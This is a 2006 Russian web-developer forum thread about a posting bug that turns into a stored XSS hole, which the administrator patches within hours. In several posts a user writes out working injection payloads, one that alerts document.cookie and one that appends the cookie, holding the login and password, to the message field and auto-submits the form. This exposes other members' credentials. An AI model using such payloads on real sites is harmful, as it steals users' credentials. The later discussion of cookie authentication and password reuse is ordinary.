|
|
|
|
|
для: AlexSol
(30.08.2006 в 09:54)
| | У меня немного по-другому "развалился"...Нет так сильно, чекбокса не было... | |
|
|
|
|
|
|
|
для: Unkind™
(30.08.2006 в 10:00)
| | болезнь прогрессирует? | |
|
|
|
|
|
|
|
для: AlexSol
(30.08.2006 в 10:04)
| | у меня развалился также как у тебя =)
Наверное этот вид болезни может потстраиваться под каждый вид браузера =) | |
|
|
|
|
|
|
|
для: krollik
(30.08.2006 в 10:20)
| | >у меня развалился также как у тебя =)
>Наверное этот вид болезни может потстраиваться под каждый вид браузера =)
под каждый вид пользователя =))
у меня во всех браузерах так. | |
|
|
|
|
|
|
|
для: Unkind™
(30.08.2006 в 10:00)
| | А не, может не заметил с первого раза) Тоже есть чекбокс. | |
|
|
|
|
|
|
|
для: AlexSol
(30.08.2006 в 09:54)
| | Угу, видать какой-то невидимый символ засобачен - спасибо, будем разбираться. | |
|
|
|
|
|
|
|
для: cheops
(30.08.2006 в 12:05)
| | Символ вполне видимый: просто в тексте закрыт комментарий и скрипт
//-->
</script>
так что весь яваскрипт далее просто выводится на экран.
Кстати, при ответе на мое сообщение произойдет тоже самое;) | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 14:16)
| | шайтан.... | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 14:16)
| | Вот любопытно мне стало...
//-->
</script><script>alert(document.cookie);</script> | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 16:33)
| | Фигак! Дырка! | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 16:38)
| | ну ваще.... | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 16:38)
| | На минуту оставить нельзя - дыру найдут :))) | |
|
|
|
|
|
|
|
для: cheops
(30.08.2006 в 18:40)
| | Какая минута? Вы в 12:05 сообщили, что в курсе дела! | |
|
|
|
|
|
|
|
для: Trianon
(30.08.2006 в 18:49)
| | Вы чего ругаетесь :)))?
PS О дыре речь там не шла - только об визуальном баге - XSS-инъекцию построил Loki. | |
|
|
|
|
|
|
|
для: cheops
(30.08.2006 в 19:00)
| | >Вы чего ругаетесь :)))?
"да нет... не вздыхал я, Вага.... Как можно...."
)) | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 16:33)
| | да...логин и пароль:(
молодец, что нашел | |
|
|
|
|
|
|
|
для: P@Sol
(30.08.2006 в 16:46)
| | тока я их и так знаю :) | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 16:33)
| | не алертить их надо, а цеплять к тексту мессаги. пониже. В качестве подписи. | |
|
|
|
|
|
|
|
для: Trianon
(30.08.2006 в 16:51)
| | эх... жаль почтовые уведомления не работают:) | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 16:54)
| | я у себя на всякий случай запретил JS . | |
|
|
|
|
|
|
|
для: Trianon
(30.08.2006 в 16:51)
| | //-->
</script>
<script>document.form.message.value = document.form.message.value + document.cookie; document.form.submit();</script>
Типа такого?)) | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 17:19)
| | получилось:))) | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 17:28)
| | ну... не так грубо, но в целом, верно. | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 17:28)
| | Капец дыра... | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 17:19)
| | У Блин
У меня браузер лаганул и почемто мессагу отправил =)) целых несколько сек были мои реквизиты! | |
|
|
|
|
|
|
|
для: krollik
(30.08.2006 в 17:59)
| | стоять бояцца!:) | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 18:01)
| | Заметил? =)
Не более 3 сек висели | |
|
|
|
|
|
|
|
для: krollik
(30.08.2006 в 18:01)
| | не броузер лагнул, а я его лягнул:) | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 18:10)
| | Вплане? ты сделал так чтобы сразу отсылались данные?
Господин cheops данную дыру пора латать! | |
|
|
|
|
|
|
|
для: krollik
(30.08.2006 в 19:16)
| | Залатана 20 минут назад. | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 17:19)
| | Вопрос к администрации:
Я тут пока дыру тестил, пароль свой засветил...
Как его можно поменять? | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 17:19)
| | - | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 17:19)
| | - | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 16:33)
| | Нифигассе дырка! =) | |
|
|
|
|
|
|
|
для: Loki
(30.08.2006 в 16:33)
| | Вот любопытно мне стало...
//
</script><script>alert(document.cookie);</script> | |
|
|
|
|
|
|
|
для: AlexSol
(30.08.2006 в 09:54)
| | ааа...я тоже вижу это...это заразно? | |
|
|
|
|
|
|
|
для: P@Sol
(30.08.2006 в 13:29)
| | Опера всё замечательно отображает :) | |
|
|
|
|
|
|
|
для: Саня
(30.08.2006 в 14:57)
| | нажми 'ответить' на первое сообщение. | |
|
|
|
|
|
|
|
для: AlexSol
(30.08.2006 в 14:58)
| | Всё равно нормально :)
Может я не успел - дырку уже залатали. | |
|
|
|
|
|
|
|
для: Саня
(30.08.2006 в 18:51)
| | Ну не переживай, я тогда тоже не успел :) | |
|
|
|
|
|
|
|
для: Саня
(30.08.2006 в 18:51)
| | Да, я за несколько минут до вашего сообщения прикрыл её наскоро... нужно подумать эффективно решение или нет... | |
|
|
|
|
|
|
|
для: cheops
(30.08.2006 в 19:03)
| | Вы не хотите поменять аутентифицирующий токен в кукисах с пары логин/пароль на что-то менее открытое?
Не последняя ж дыра... | |
|
|
|
|
|
|
|
для: Trianon
(30.08.2006 в 19:18)
| | А смысл? Злоумышленик если захочет получить пароли форума, вряд ли остановится перед их расшифровкой...
PS Пароль его будет интересовать только один: администраторский, подходящий к другим частям сайта - такого пароля не существует. Все остальные пароли не представляют никакой ценности, так как на форуме в основном работают Web-программисты - они никогда более менее ценный пароль на форуме использовать не будут. | |
|
|
|
|
|
|
|
для: cheops
(30.08.2006 в 19:30)
| | Здесь достаточно много наивных людей.
У которых один или почти один пароль и на форум и на аську и на почту.
Конечно, случаи, подобные тому, что произошел с akir'ой, учат.
Но ведь болезненно весьма учат, Вы не находите? | |
|
|
|
|
|
|
|
для: Trianon
(30.08.2006 в 19:37)
| | Кто сказал, что у меня один пароль на все?
Просто не надо пароли хранить на mail.ru или не забывать их удалять. | |
|
|
|
|
|
|
|
для: akira
(30.08.2006 в 19:52)
| | Я этого не утверждал.
Я сказал, что Вы стали более прагматичным, и что за это пришлось заплатить.
Вы несогласны?
А те у кого один пароль на всё - есть. Я даже убежден, что их большинство.
Слишком часто сталкивался с подобного рода вещами.
Причем у людей куда более опытных, уверяю Вас. | |
|
|
|
|
|
|
|
для: Trianon
(30.08.2006 в 19:37)
| | Так а смысл какой в шифровании пароля? Если их всё равно расшифрет любой, вопрос времени, причём не очень большого?
>Но ведь болезненно весьма учат, Вы не находите?
Нахожу, что весьма болезненно... это свойство злоумышлеников - они на мир немного другими глазами смотрят, если бы они хотя бы изредка смотрели на мир глазами своих жертв, все бы страдали меньше, в том числе и они сами.
>У которых один или почти один пароль и на форум и на аську и на почту.
Вы же сами прекрасно понимаете, что мы не можем от этого защитить каждого человека - универсальный пароль используется во множестве мест - рано или поздно он уплывёт - единственная защита более или менее вменяемая аудитория. Которую дыра позабавит, но которые ей никогда не воспользуются в своих интересах. Перекройка рабочего форума дело тоже не простое, так как можно внести новые ошибки, осуществлять её нужно только в том случае, если есть твёрдая уверенность в улучшении ситуации. Я понимаю, если бы не было альтернативы, но можно отвечать из под серого ника... без пароля и логина. | |
|
|
|
|
автор: motoP@Sol (30.08.2006 в 18:20) |
|
|
для: Саня
(30.08.2006 в 14:57)
| | даже miniOpera отрабатывает этот код | |
|
|
|
|
|
|
|
для: motoP@Sol
(30.08.2006 в 18:20)
| | тема пользуется популярностью! | |
|
|
|
|
|
|
|
для: AlexSol
(30.08.2006 в 09:54)
| | Тема здоровая, поэтому закрывается, если кто-то хочет продолжить, давайте, заведём новую, про то шифровать пароли или нет в публичных местах уже много раз обсуждали, но если нужно поднять вопрос снова - давайте в новой ветке. | |
|
|
|